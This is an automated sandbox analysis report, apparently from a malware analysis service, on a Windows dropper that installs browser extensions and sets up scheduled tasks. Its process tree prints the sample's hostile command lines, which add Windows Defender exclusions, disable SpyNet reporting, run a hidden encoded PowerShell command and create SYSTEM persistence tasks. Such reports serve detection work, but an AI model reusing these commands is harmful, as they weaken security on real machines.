Analysis
-
max time kernel
155s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20231023-en -
resource tags
arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system -
submitted
20/11/2023, 19:01
Static task
static1
General
-
Target
4f7ab463877c56b037f15ed7c8b4acf83db61d4714d57a550c8d5c2169dc8124.exe
-
Size
7.2MB
-
MD5
2b6e779f8f00dda317c97309a1a04324
-
SHA1
b0c42518fe1574b9a31e7d6146b0a3864cac3895
-
SHA256
4f7ab463877c56b037f15ed7c8b4acf83db61d4714d57a550c8d5c2169dc8124
-
SHA512
f1fccf552453cc84832166f52af0d4a1e93bfd642bdeb340443fdc767652bc9e83c44ccf3f46e29c5c1c06b61dcf9d11cd88673716956a4a8459d1d413c0e57d
-
SSDEEP
196608:91OwADaK7p4a9kl8WrK4mP622yq9Gj178GXUQnxc7Yf3Eu:3OwAGyp4Fl04Q2ykGZ6Q67Nu
Malware Config
Signatures
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation EaIfGtk.exe -
Executes dropped EXE 4 IoCs
pid Process 1644 Install.exe 4976 Install.exe 528 NHBQLLb.exe 3252 EaIfGtk.exe -
Loads dropped DLL 1 IoCs
pid Process 1668 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json EaIfGtk.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json EaIfGtk.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini EaIfGtk.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content EaIfGtk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 EaIfGtk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 EaIfGtk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B EaIfGtk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 EaIfGtk.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE EaIfGtk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies EaIfGtk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8C0A4A9E1CEFEB34D84E7975A8A5D28F EaIfGtk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft EaIfGtk.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol EaIfGtk.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol NHBQLLb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 EaIfGtk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 EaIfGtk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA EaIfGtk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 EaIfGtk.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache EaIfGtk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 EaIfGtk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA EaIfGtk.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA EaIfGtk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 EaIfGtk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B EaIfGtk.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini NHBQLLb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData EaIfGtk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F EaIfGtk.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA EaIfGtk.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi EaIfGtk.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak EaIfGtk.exe File created C:\Program Files (x86)\HwYHmiwJWhATC\vWLXDNg.xml EaIfGtk.exe File created C:\Program Files (x86)\kfPhUuJGKgUn\kTaCGyP.dll EaIfGtk.exe File created C:\Program Files (x86)\OsumLTlUUhuU2\nHKLToe.xml EaIfGtk.exe File created C:\Program Files (x86)\KtOMBNNCU\QwDdTd.dll EaIfGtk.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi EaIfGtk.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak EaIfGtk.exe File created C:\Program Files (x86)\HwYHmiwJWhATC\UDWPdAQ.dll EaIfGtk.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja EaIfGtk.exe File created C:\Program Files (x86)\KtOMBNNCU\uOHkTgU.xml EaIfGtk.exe File created C:\Program Files (x86)\OsumLTlUUhuU2\bQVwHDbdyTddK.dll EaIfGtk.exe File created C:\Program Files (x86)\dbQdUPaXiQxCqjpiquR\VjMJwwU.dll EaIfGtk.exe File created C:\Program Files (x86)\dbQdUPaXiQxCqjpiquR\YPnqTqG.xml EaIfGtk.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\jGXpWsmIvmguXvRXu.job schtasks.exe File created C:\Windows\Tasks\HmubaeLvYeTNQNs.job schtasks.exe File created C:\Windows\Tasks\DDsMfHqDUIqhbhqNv.job schtasks.exe File created C:\Windows\Tasks\bjeZIAkmpWQsLhKMUx.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2376 schtasks.exe 2768 schtasks.exe 408 schtasks.exe 3268 schtasks.exe 3540 schtasks.exe 2564 schtasks.exe 4568 schtasks.exe 4716 schtasks.exe 2880 schtasks.exe 2564 schtasks.exe 1156 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix EaIfGtk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{c2d04a06-0000-0000-0000-d01200000000}\MaxCapacity = "14116" EaIfGtk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" EaIfGtk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" EaIfGtk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" EaIfGtk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer EaIfGtk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket EaIfGtk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" EaIfGtk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "0" EaIfGtk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe -
Suspicious behavior: EnumeratesProcesses 45 IoCs
pid Process 116 powershell.EXE 116 powershell.EXE 116 powershell.EXE 2908 powershell.exe 2908 powershell.exe 2008 powershell.exe 2008 powershell.exe 4964 powershell.EXE 4964 powershell.EXE 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe 3252 EaIfGtk.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 116 powershell.EXE Token: SeDebugPrivilege 2908 powershell.exe Token: SeDebugPrivilege 2008 powershell.exe Token: SeDebugPrivilege 4964 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4580 wrote to memory of 1644 4580 4f7ab463877c56b037f15ed7c8b4acf83db61d4714d57a550c8d5c2169dc8124.exe 93 PID 4580 wrote to memory of 1644 4580 4f7ab463877c56b037f15ed7c8b4acf83db61d4714d57a550c8d5c2169dc8124.exe 93 PID 4580 wrote to memory of 1644 4580 4f7ab463877c56b037f15ed7c8b4acf83db61d4714d57a550c8d5c2169dc8124.exe 93 PID 1644 wrote to memory of 4976 1644 Install.exe 94 PID 1644 wrote to memory of 4976 1644 Install.exe 94 PID 1644 wrote to memory of 4976 1644 Install.exe 94 PID 4976 wrote to memory of 3860 4976 Install.exe 96 PID 4976 wrote to memory of 3860 4976 Install.exe 96 PID 4976 wrote to memory of 3860 4976 Install.exe 96 PID 4976 wrote to memory of 4188 4976 Install.exe 98 PID 4976 wrote to memory of 4188 4976 Install.exe 98 PID 4976 wrote to memory of 4188 4976 Install.exe 98 PID 4188 wrote to memory of 3904 4188 forfiles.exe 101 PID 4188 wrote to memory of 3904 4188 forfiles.exe 101 PID 4188 wrote to memory of 3904 4188 forfiles.exe 101 PID 3860 wrote to memory of 1764 3860 forfiles.exe 100 PID 3860 wrote to memory of 1764 3860 forfiles.exe 100 PID 3860 wrote to memory of 1764 3860 forfiles.exe 100 PID 3904 wrote to memory of 1640 3904 cmd.exe 103 PID 3904 wrote to memory of 1640 3904 cmd.exe 103 PID 3904 wrote to memory of 1640 3904 cmd.exe 103 PID 1764 wrote to memory of 4160 1764 cmd.exe 102 PID 1764 wrote to memory of 4160 1764 cmd.exe 102 PID 1764 wrote to memory of 4160 1764 cmd.exe 102 PID 1764 wrote to memory of 2860 1764 cmd.exe 104 PID 1764 wrote to memory of 2860 1764 cmd.exe 104 PID 1764 wrote to memory of 2860 1764 cmd.exe 104 PID 3904 wrote to memory of 5068 3904 cmd.exe 105 PID 3904 wrote to memory of 5068 3904 cmd.exe 105 PID 3904 wrote to memory of 5068 3904 cmd.exe 105 PID 4976 wrote to memory of 2564 4976 Install.exe 109 PID 4976 wrote to memory of 2564 4976 Install.exe 109 PID 4976 wrote to memory of 2564 4976 Install.exe 109 PID 4976 wrote to memory of 4220 4976 Install.exe 111 PID 4976 wrote to memory of 4220 4976 Install.exe 111 PID 4976 wrote to memory of 4220 4976 Install.exe 111 PID 116 wrote to memory of 2280 116 powershell.EXE 116 PID 116 wrote to memory of 2280 116 powershell.EXE 116 PID 4976 wrote to memory of 3672 4976 Install.exe 124 PID 4976 wrote to memory of 3672 4976 Install.exe 124 PID 4976 wrote to memory of 3672 4976 Install.exe 124 PID 4976 wrote to memory of 4568 4976 Install.exe 126 PID 4976 wrote to memory of 4568 4976 Install.exe 126 PID 4976 wrote to memory of 4568 4976 Install.exe 126 PID 528 wrote to memory of 2908 528 NHBQLLb.exe 138 PID 528 wrote to memory of 2908 528 NHBQLLb.exe 138 PID 528 wrote to memory of 2908 528 NHBQLLb.exe 138 PID 2908 wrote to memory of 4232 2908 powershell.exe 140 PID 2908 wrote to memory of 4232 2908 powershell.exe 140 PID 2908 wrote to memory of 4232 2908 powershell.exe 140 PID 4232 wrote to memory of 2980 4232 cmd.exe 141 PID 4232 wrote to memory of 2980 4232 cmd.exe 141 PID 4232 wrote to memory of 2980 4232 cmd.exe 141 PID 2908 wrote to memory of 1156 2908 powershell.exe 142 PID 2908 wrote to memory of 1156 2908 powershell.exe 142 PID 2908 wrote to memory of 1156 2908 powershell.exe 142 PID 2908 wrote to memory of 4616 2908 powershell.exe 143 PID 2908 wrote to memory of 4616 2908 powershell.exe 143 PID 2908 wrote to memory of 4616 2908 powershell.exe 143 PID 2908 wrote to memory of 964 2908 powershell.exe 144 PID 2908 wrote to memory of 964 2908 powershell.exe 144 PID 2908 wrote to memory of 964 2908 powershell.exe 144 PID 2908 wrote to memory of 1960 2908 powershell.exe 145 PID 2908 wrote to memory of 1960 2908 powershell.exe 145
Processes
-
C:\Users\Admin\AppData\Local\Temp\4f7ab463877c56b037f15ed7c8b4acf83db61d4714d57a550c8d5c2169dc8124.exe"C:\Users\Admin\AppData\Local\Temp\4f7ab463877c56b037f15ed7c8b4acf83db61d4714d57a550c8d5c2169dc8124.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4580 -
C:\Users\Admin\AppData\Local\Temp\7zS5C63.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Users\Admin\AppData\Local\Temp\7zS6DF7.tmp\Install.exe.\Install.exe /JTkdidaY "385118" /S3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:3860 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1764 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:4160
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:2860
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4188 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:3904 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1640
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:5068
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gCcILNHJa" /SC once /ST 16:18:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gCcILNHJa"4⤵PID:4220
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gCcILNHJa"4⤵PID:3672
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bjeZIAkmpWQsLhKMUx" /SC once /ST 19:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\yeQxYYgqRyYPtFDwH\RwocRFWvhBWPqcd\NHBQLLb.exe\" 7v /VRsite_idamu 385118 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4568
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:116 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2280
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1628
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2232
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1564
-
C:\Users\Admin\AppData\Local\Temp\yeQxYYgqRyYPtFDwH\RwocRFWvhBWPqcd\NHBQLLb.exeC:\Users\Admin\AppData\Local\Temp\yeQxYYgqRyYPtFDwH\RwocRFWvhBWPqcd\NHBQLLb.exe 7v /VRsite_idamu 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:528 -
